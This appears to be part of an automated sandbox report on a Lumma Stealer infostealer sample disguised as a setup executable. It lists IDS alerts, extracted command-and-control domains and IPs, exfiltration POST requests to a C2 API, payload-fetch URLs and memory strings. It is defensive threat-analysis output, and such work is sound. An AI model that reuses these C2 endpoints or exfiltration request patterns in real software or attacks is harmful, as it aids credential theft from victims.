            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_0299ADBD
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0150E4D7h]0_2_0299ADBD
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then jmp eax0_2_0298C5A2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov word ptr [esi], ax0_2_0299E5A2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-28C59510h]0_2_0299DDE9
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then jmp dword ptr [00448888h]0_2_02999DE8
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 13884179h0_2_029C0D32
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ecx, eax0_2_029BD522
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ebx, edx0_2_029AAD42

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49756 -> 104.21.25.52:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: cloudewahsj.shop
            Source: Malware configuration extractorURLs: tirepublicerj.shop
            Source: Malware configuration extractorURLs: wholersorie.shop
            Source: Malware configuration extractorURLs: rabidcowse.shop
            Source: Malware configuration extractorURLs: abruptyopsn.shop
            Source: Malware configuration extractorURLs: beattalkerz.cyou
            Source: Malware configuration extractorURLs: framekgirus.shop
            Source: Malware configuration extractorURLs: noisycuttej.shop
            Source: Malware configuration extractorURLs: nearycrepso.shop
            Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 185.161.251.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.25.52:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GEC2K66UIK1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18120Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0J1ENAKYSQRTU5UCLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8777Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B7GDPGPLHYUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20394Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8Z8YAVH559VDX1PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7111Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DQ9HCLZXYVNW0P7RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1241Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DPCH7IOTRUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586472Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: beattalkerz.cyou
            Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
            Source: global trafficDNS traffic detected: DNS query: beattalkerz.cyou
            Source: global trafficDNS traffic detected: DNS query: cegu.shop
            Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
            Source: global trafficDNS traffic detected: DNS query: dfgh.online
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beattalkerz.cyou
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Set-UpFile_v25.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
            Source: powershell.exe, 00000004.00000002.1969577811.00000000005D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Set-UpFile_v25.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
            Source: Set-UpFile_v25.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
            Source: Set-UpFile_v25.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Set-UpFile_v25.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
            Source: Set-UpFile_v25.exeString found in binary or memory: http://ocsp.thawte.com0
            Source: powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Set-UpFile_v25.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: Set-UpFile_v25.exeString found in binary or memory: http://s2.symcb.com0
            Source: powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Set-UpFile_v25.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
            Source: Set-UpFile_v25.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
            Source: Set-UpFile_v25.exeString found in binary or memory: http://sf.symcd.com0&
            Source: Set-UpFile_v25.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
            Source: Set-UpFile_v25.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: Set-UpFile_v25.exeString found in binary or memory: http://sv.symcd.com0&
            Source: Set-UpFile_v25.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: Set-UpFile_v25.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: Set-UpFile_v25.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Set-UpFile_v25.exeString found in binary or memory: http://www.innosetup.com/
            Source: Set-UpFile_v25.exeString found in binary or memory: http://www.remobjects.com/ps
            Source: Set-UpFile_v25.exeString found in binary or memory: http://www.symauth.com/cps0(
            Source: Set-UpFile_v25.exeString found in binary or memory: http://www.symauth.com/rpa00
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000002.1962621793.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyorT
            Source: Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367B000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1804338671.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/
            Source: Set-UpFile_v25.exe, 00000000.00000002.1962621793.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/4I
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1920128987.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/F
            Source: Set-UpFile_v25.exe, 00000000.00000003.1790726742.0000000000845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/api
            Source: Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/api0
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908617857.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/api9bf$
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apiF9
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apibu
            Source: Set-UpFile_v25.exe, 00000000.00000003.1790726742.0000000000845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apic
            Source: Set-UpFile_v25.exe, 00000000.00000003.1876965792.000000000367F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apijh
            Source: Set-UpFile_v25.exe, 00000000.00000002.1962621793.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apilMQ-$
            Source: Set-UpFile_v25.exe, 00000000.00000003.1876965792.000000000367F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apila
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908617857.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apis
            Source: Set-UpFile_v25.exe, 00000000.00000003.1877000966.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1877228216.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/apizp
            Source: Set-UpFile_v25.exe, 00000000.00000003.1920128987.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/f
            Source: Set-UpFile_v25.exe, 00000000.00000003.1877000966.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou/y
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000889000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907710395.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000002.1962678644.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beattalkerz.cyou:443/api
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Set-UpFile_v25.exe, 00000000.00000002.1966453532.0000000003683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
            Source: Set-UpFile_v25.exe, 00000000.00000002.1966453532.0000000003683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Set-UpFile_v25.exeString found in binary or memory: https://d.symcb.com/cps0%
            Source: Set-UpFile_v25.exeString found in binary or memory: https://d.symcb.com/rpa0
            Source: powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
            Source: powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
            Source: powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PCx
            Source: powershell.exe, 00000004.00000002.1970487568.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.1971280536.0000000004F58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt%
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt.3
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtcoded
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1R=
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
            Source: powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Set-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49756 version: TLS 1.2
